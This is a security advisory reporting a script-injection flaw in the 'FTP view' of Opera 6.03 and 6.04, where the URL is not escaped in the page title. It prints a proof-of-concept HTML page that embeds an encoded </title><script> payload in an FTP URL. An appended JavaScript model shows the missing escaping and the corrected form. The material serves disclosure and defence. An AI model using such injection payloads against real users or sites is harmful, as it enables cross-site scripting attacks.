COMMAND

    Opera 'FTP view' Script Execution vulnerability

SYSTEMS AFFECTED

    Windows2000 SP2 Opera 6.03
    Windows2000 SP2 Opera 6.04

PROBLEM

    Eiji "James" Yoshida [zaddik@geocities.co.jp]
    [http://www.geocities.co.jp/SiliconValley/1667/index.htm] posted:

    Opera allows running malicious scripts due to a bug in 'FTP view'.
    If you click on a malicious link, the script embedded in the URL
    will run.

    This problem is in 'FTP view'. The '<title>URL</title>' is not
    escaped.

    Exploit code:
    ~~~~~~~~~~~~~
    <html>
    <head>
    <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
    </head>
    <body>
    <script>window.open("ftp://[FTPserver]/");</script>
    </body>
    </html>

    Example:
    ~~~~~~~~
    <html>
    <head>
    <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
    </head>
    <body>
    <script>window.open("ftp://ftp.opera.com/");</script>
    </body>
    </html>

    Demonstration:
    ~~~~~~~~~~~~~~
    http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html

SOLUTION

    Workaround:
    ~~~~~~~~~~~
    Disable JavaScript.
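
The missing escaping described under PROBLEM, as an added example that is not part of the original advisory and is not Opera's code: a JavaScript model of a generated FTP listing page that places the percent-decoded URL in <title>, first unescaped and then HTML-escaped. The function names are hypothetical, and the sample input is the URL from the advisory's own example.

```javascript
// Model of a browser-generated FTP listing page. Function names are
// hypothetical; this is not Opera's implementation.

// Sample input: the URL taken from the advisory's example.
const SAMPLE_URL =
  "ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/";

// Percent-decode a URL for display. A malformed sequence (such as a lone
// "%") makes decodeURIComponent throw URIError, so fall back to the raw text.
function decodeForDisplay(url) {
  try {
    return decodeURIComponent(url);
  } catch (e) {
    return url;
  }
}

// Escape the characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Behaviour the advisory describes: the decoded URL goes into <title> as-is,
// so a "</title>" in the userinfo part closes the element early.
function renderListingUnescaped(url) {
  return `<html><head><title>${decodeForDisplay(url)}</title></head><body></body></html>`;
}

// Corrected form: URL-derived text is escaped before it enters the markup.
function renderListingEscaped(url) {
  return `<html><head><title>${escapeHtml(decodeForDisplay(url))}</title></head><body></body></html>`;
}

// Regression check: did URL-derived text introduce a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("unescaped has <script>:", containsScriptTag(renderListingUnescaped(SAMPLE_URL)));
console.log("escaped has <script>:  ", containsScriptTag(renderListingEscaped(SAMPLE_URL)));
console.log(renderListingEscaped(SAMPLE_URL));
```

The escaped page still shows the full URL text in the title; only its interpretation as markup changes.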